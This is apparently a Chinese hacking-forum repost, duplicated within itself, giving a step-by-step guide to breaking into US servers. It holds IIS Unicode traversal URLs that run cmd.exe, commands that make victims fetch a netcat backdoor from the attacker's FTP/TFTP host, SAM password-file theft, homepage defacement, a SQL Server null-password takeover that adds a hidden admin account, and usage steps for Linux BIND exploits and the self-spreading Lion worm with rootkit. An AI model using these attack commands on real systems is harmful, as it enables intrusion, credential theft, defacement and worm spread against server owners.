论坛: 菜鸟乐园 标题: 简简单单教会你入侵米国(转载) 复制本贴地址    
作者: feimeng [feimeng]    论坛用户   登录



*****1.NT入侵*****

1. 工具下载 (X-Scanner)扫描NT UNICODE漏洞的库我重新更新过!

2. 工具下载(SQLExec.zip)uid=0(root) gid=0(root) group=0(root)


*****1.NT入侵*****

1. 工具下载 (X-Scanner)扫描NT UNICODE漏洞的库我重新更新过!

2. 工具下载(SQLExec.zip)

3. 工具下载 (unicode.zip)

* NT 入侵过程扫描

用X-Scanner扫描美国网段

当然是扫描CGI漏洞,SQL-SERVER默认帐户,NT弱口令。

**************************************NT UNICODE 漏洞>***************************************

方法

1,找个可以ftp上传的主机,比如说你以前黑过的,或者是某个可以公用ftp的主机, 把要上传到目标主机上的文件srv.exe传上去(ncx99(在工具下载的unicode.zip里面),用于开个99端口telnet上去) 假如这个ftp主机的ip是:1.1.1.1 username:tom passwd:pass 2,假如你要黑的目标主机的ip是2.2.2.2,先把目标主机的cmd.exe copy成/scripts/ccc.exe,为了方便操作和避免iis加载程序时检测特殊字符出问题。 http://2.2.2.2/scripts/..%c1%1c../winnt/system32/cmd.exe?/c copy c:\winnt\system32\cmd.exe d:\inetpub\scripts\ccc.exe 3,编辑一个上传执行文件,再利用ftp -s命令上传文件到scripts目录中。 http://2.2.2.2/scripts/ccc.exe?/c echo open 202.99.168.15 > C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo name >> C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo fuck1234 >>C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo get default.htm >>> C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo quit>>C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c ftp -s:up.txt 4,运行srv.exe,然后就可以telnet上去。 http://2.2.2.2/scripts/srv.exe 之后你就可以telnet 2.2.2.2 99后发现 c:\inetpub\scripts\_ 提示符就在你面前了。 对于NT4,还可以把它的sam._抓下来破解,WIN2000的sam.已没有用了。 http://2.2.2.2/scripts/ccc.exe?/c copy d:\winnt\repair\sam._ d:\inetpub\wwwroot 在用http://2.2.2.2/sam._把它抓下来,用msdos下的命令 expand sam._ SAM. 把SAM.带回去再用l0pht解开吧。

2.如果你嫌烦的话。在IE里打上http://xxx.xxx.xxx.xxx/.ida看他的绝对目录!(如果目录为c:\inetpub\wwroot)

只要把他/winnt/system32/cmd.exe拷贝到一个可执行目录并改名为ccc.exe( 如果目录为scripts)

http:/xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo fuck usa > c:\inetpub\wwwroot\default.html

你就把他的主页改为fuck us了!

3.关于用unicode上传文件的另一种方法

开始: 现在我们找到的一台漏洞主机:202.100.100.1(假设) 当然下面的调用大家再熟悉不过: http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。 但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。 经过比较,让服务器下载木马的方法较好: 首先,下载http://www.cners.com/tools/unicode.zip 解压后有如下文件: tftpd32.exe(一个FTP服务器) ncx99.exe(telnet 到99端口) 这两个大家都熟悉吧,其他的不用管。 运行tftpd32.exe 这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。 回到你的浏览器,在地址栏里填入: http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe ???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情 况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。 然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。 再使用如下调用来执行ncx99.exe(sr.exe) http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe 然后您就可以 telnet 202.100.100.1 99 

**************************************SQL SERVER漏洞入侵*************************************

用X-Scanner扫到美国主机1433 sa=null

你就用到工具下载里面的SQLExec.zip了。

解压后。

c:\SQLExec xxx.xxx.xxx.xxx.xxx(美国网站)

-----------------------出现远程命令行的界面 ---------------------------------------------------

SQLCmd>_ 因此!我添加了一个后门帐号!(因为其站上只有一个Adminstrator帐号! 我将Guest用户激活 SQLCmd>net user guest /actives net user guest /active:yes 

The command completed successfully. 命令成功执行!!! 

SQLCmd>net user guest 123456/*添加后门帐号密码!*/

net user guest 123456 The command completed sucessfully.

SQLCmd>net localgroup administrator guest /add /*将GUEST加入管理员组---当然你也可以该admin密码*/ net lovalgroup administrator guest /add The command completed successfully. 

这样你就可以远程登入上去了。当然你的系统是NT !!

C:\ net use \\xxx.xxx.xxx.xxx\ipc$ "123456" /user:"guest"

The command completed sucessfully

登上去了

c:\net use y: \\xxx.xxx.xxx.xxx\c$

The command completed sucessfully

把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧!

**************如果你的系统是98系列

你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号:guest 密码:123456

然后在你的MS-DOS下

c:\net use \\xxx.xxx.xxx.xxx\ipc$ (你不用在这里填写密码帐号了)

The command completed sucessfully (命令成功执行)

下面的方法和前面一样了!!!!

**********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************



***********************************对美国linux主机的入侵***********************************

首先你的要有个Linux肉鸡。不过你用linux拨号上网的更好!!

工具下载redbind.tgz 针对 bind 8.2 8.2.1 8.2.2 8.2.2-PX

工具下载redseclpd.tgz 针对redhat linux 7.0

工具下载redstatdx.tgz 针对 redhat linux系列

工具下载redftp.tgz 针对 wuftpd 2.6.0 

********************举例:redbind.tgz 另外几个工具使用说明差不多 *****************************

用普通账号登陆linux 

redcrack$tar xvzf bind.tgz 解压缩

redcrack$cd /redbind 进redbind目录

redcrack$./redbind 208 44就开始扫描208.44 B类网!并自动攻击!

如果攻击到有漏洞的主机 并且溢出成功会自动出来一个root shell

你可以 /usr/sbin/adduser www /*开个www账号*/

/usr/bin/passwd www /*给他加个密码*/ 

(提高权限的方法是 su.c只要你ftp上传上去 gcc -o su su.c编译一下。再执行一下就变为root了!:-))

想退出shell 就按ctrl+c后继续扫描 (按一次就够多按了会退出扫描的)

如果扫描停顿也可按ctrl+c后继续扫描 

提供1i0n编写的蠕虫!!!

使用方法是(在你拿到普通帐号的前提下)

用su.c变为root!

cd到/dev目录

mkdir lib开个lib目录

cp /home/www/1i0n.tgz /dev/lib /*把1i0n.tgz copy到/dev/lib里面*/

tar xvzf 1i0n.tgz 后执行./1i0n.sh

替换掉他的主页了!!并开始传播 攻击下载 

附:                               红盟发布的DNS killer说明的程式下载 

DNS killer (Lion worm)[简要说明]

DNS killer 是一个运行在Redhat linux 上的网段扫描脚本,运行后能自动扫描网段并传播!

功能简列如下:

1、运行平台 <= redhat linux 6.2

2、感染运行BIND DNS服务器的Linux主机。可以感染的BIND版本是:8.2、8.2-P1、8.2.1、8.2.2-Px、8.2.3-beta

3、自动生成B类IP扫描.

4、自动安装tr0n rootkit里的某些后门,隐藏脚本文件,扫描进程和扫描产生的连接

5、能自动传播

6、能自动识别敌方IP.如果为要攻击的目标,自动进行一系列破坏.

[使用说明]

1.在肉鸡上建立 /dev/lib 目录.(注意,是肉鸡)

2.把1i0n.tgz 上传到/dev/lib目录下.

3.telnet上肉鸡并转到/dev/lib 目录

4.tar -zxvf 1i0n.tgz 解压程序包.

5. 运行 ./1i0n.sh 脚本自动完成安装并开始扫描攻击.

6.程序是对随机B类IP进行扫描

7.如果你想对固定IP段进行扫描,解压后直接运行

./getip.sh 

./pscan xxx.xxx 53 &

./worm.sh &

其中 xxx.xxx 为你要扫描的B类IP.

8.如果你想对固定IP段进行攻击,解压后直接运行

./getip.sh 

./pscankill xxx.xxx 53 &

./killit.sh &

(注意,会对目标直接破坏!)

[程序下载]

1i0nG.tgz 
(138K - lion worm )



3. 工具下载 (unicode.zip)

* NT 入侵过程扫描

用X-Scanner扫描美国网段

当然是扫描CGI漏洞,SQL-SERVER默认帐户,NT弱口令。

**************************************NT UNICODE 漏洞>***************************************

方法

1,找个可以ftp上传的主机,比如说你以前黑过的,或者是某个可以公用ftp的主机, 把要上传到目标主机上的文件srv.exe传上去(ncx99(在工具下载的unicode.zip里面),用于开个99端口telnet上去) 假如这个ftp主机的ip是:1.1.1.1 username:tom passwd:pass 2,假如你要黑的目标主机的ip是2.2.2.2,先把目标主机的cmd.exe copy成/scripts/ccc.exe,为了方便操作和避免iis加载程序时检测特殊字符出问题。 http://2.2.2.2/scripts/..%c1%1c../winnt/system32/cmd.exe?/c copy c:\winnt\system32\cmd.exe d:\inetpub\scripts\ccc.exe 3,编辑一个上传执行文件,再利用ftp -s命令上传文件到scripts目录中。 http://2.2.2.2/scripts/ccc.exe?/c echo open 202.99.168.15 > C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo name >> C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo fuck1234 >>C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo get default.htm >>> C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo quit>>C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c ftp -s:up.txt 4,运行srv.exe,然后就可以telnet上去。 http://2.2.2.2/scripts/srv.exe 之后你就可以telnet 2.2.2.2 99后发现 c:\inetpub\scripts\_ 提示符就在你面前了。 对于NT4,还可以把它的sam._抓下来破解,WIN2000的sam.已没有用了。 http://2.2.2.2/scripts/ccc.exe?/c copy d:\winnt\repair\sam._ d:\inetpub\wwwroot 在用http://2.2.2.2/sam._把它抓下来,用msdos下的命令 expand sam._ SAM. 把SAM.带回去再用l0pht解开吧。

2.如果你嫌烦的话。在IE里打上http://xxx.xxx.xxx.xxx/.ida看他的绝对目录!(如果目录为c:\inetpub\wwroot)

只要把他/winnt/system32/cmd.exe拷贝到一个可执行目录并改名为ccc.exe( 如果目录为scripts)

http:/xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo fuck usa > c:\inetpub\wwwroot\default.html

你就把他的主页改为fuck us了!

3.关于用unicode上传文件的另一种方法

开始: 现在我们找到的一台漏洞主机:202.100.100.1(假设) 当然下面的调用大家再熟悉不过: http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。 但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。 经过比较,让服务器下载木马的方法较好: 首先,下载http://www.cners.com/tools/unicode.zip 解压后有如下文件: tftpd32.exe(一个FTP服务器) ncx99.exe(telnet 到99端口) 这两个大家都熟悉吧,其他的不用管。 运行tftpd32.exe 这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。 回到你的浏览器,在地址栏里填入: http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe ???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情 况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。 然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。 再使用如下调用来执行ncx99.exe(sr.exe) http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe 然后您就可以 telnet 202.100.100.1 99 

**************************************SQL SERVER漏洞入侵*************************************

用X-Scanner扫到美国主机1433 sa=null

你就用到工具下载里面的SQLExec.zip了。

解压后。

c:\SQLExec xxx.xxx.xxx.xxx.xxx(美国网站)

-----------------------出现远程命令行的界面 ---------------------------------------------------

SQLCmd>_ 因此!我添加了一个后门帐号!(因为其站上只有一个Adminstrator帐号! 我将Guest用户激活 SQLCmd>net user guest /actives net user guest /active:yes 

The command completed successfully. 命令成功执行!!! 

SQLCmd>net user guest 123456/*添加后门帐号密码!*/

net user guest 123456 The command completed sucessfully.

SQLCmd>net localgroup administrator guest /add /*将GUEST加入管理员组---当然你也可以该admin密码*/ net lovalgroup administrator guest /add The command completed successfully. 

这样你就可以远程登入上去了。当然你的系统是NT !!

C:\ net use \\xxx.xxx.xxx.xxx\ipc$ "123456" /user:"guest"

The command completed sucessfully

登上去了

c:\net use y: \\xxx.xxx.xxx.xxx\c$

The command completed sucessfully

把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧!

**************如果你的系统是98系列

你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号:guest 密码:123456

然后在你的MS-DOS下

c:\net use \\xxx.xxx.xxx.xxx\ipc$ (你不用在这里填写密码帐号了)

The command completed sucessfully (命令成功执行)

下面的方法和前面一样了!!!!

**********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************



***********************************对美国linux主机的入侵***********************************

首先你的要有个Linux肉鸡。不过你用linux拨号上网的更好!!

工具下载redbind.tgz 针对 bind 8.2 8.2.1 8.2.2 8.2.2-PX

工具下载redseclpd.tgz 针对redhat linux 7.0

工具下载redstatdx.tgz 针对 redhat linux系列

工具下载redftp.tgz 针对 wuftpd 2.6.0 

********************举例:redbind.tgz 另外几个工具使用说明差不多 *****************************

用普通账号登陆linux 

redcrack$tar xvzf bind.tgz 解压缩

redcrack$cd /redbind 进redbind目录

redcrack$./redbind 208 44就开始扫描208.44 B类网!并自动攻击!

如果攻击到有漏洞的主机 并且溢出成功会自动出来一个root shell

你可以 /usr/sbin/adduser www /*开个www账号*/

/usr/bin/passwd www /*给他加个密码*/ 

(提高权限的方法是 su.c只要你ftp上传上去 gcc -o su su.c编译一下。再执行一下就变为root了!:-))

想退出shell 就按ctrl+c后继续扫描 (按一次就够多按了会退出扫描的)

如果扫描停顿也可按ctrl+c后继续扫描 

提供1i0n编写的蠕虫!!!

使用方法是(在你拿到普通帐号的前提下)

用su.c变为root!

cd到/dev目录

mkdir lib开个lib目录

cp /home/www/1i0n.tgz /dev/lib /*把1i0n.tgz copy到/dev/lib里面*/

tar xvzf 1i0n.tgz 后执行./1i0n.sh

替换掉他的主页了!!并开始传播 攻击下载 

附:                               红盟发布的DNS killer说明的程式下载 

DNS killer (Lion worm)[简要说明]

DNS killer 是一个运行在Redhat linux 上的网段扫描脚本,运行后能自动扫描网段并传播!

功能简列如下:

1、运行平台 <= redhat linux 6.2

2、感染运行BIND DNS服务器的Linux主机。可以感染的BIND版本是:8.2、8.2-P1、8.2.1、8.2.2-Px、8.2.3-beta

3、自动生成B类IP扫描.

4、自动安装tr0n rootkit里的某些后门,隐藏脚本文件,扫描进程和扫描产生的连接

5、能自动传播

6、能自动识别敌方IP.如果为要攻击的目标,自动进行一系列破坏.

[使用说明]

1.在肉鸡上建立 /dev/lib 目录.(注意,是肉鸡)

2.把1i0n.tgz 上传到/dev/lib目录下.

3.telnet上肉鸡并转到/dev/lib 目录

4.tar -zxvf 1i0n.tgz 解压程序包.

5. 运行 ./1i0n.sh 脚本自动完成安装并开始扫描攻击.

6.程序是对随机B类IP进行扫描

7.如果你想对固定IP段进行扫描,解压后直接运行

./getip.sh 

./pscan xxx.xxx 53 &

./worm.sh &

其中 xxx.xxx 为你要扫描的B类IP.

8.如果你想对固定IP段进行攻击,解压后直接运行

./getip.sh 

./pscankill xxx.xxx 53 &

./killit.sh &

(注意,会对目标直接破坏!)

[程序下载]

1i0nG.tgz 
(138K - lion worm )



地主 发表时间: 1/2 2:44

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号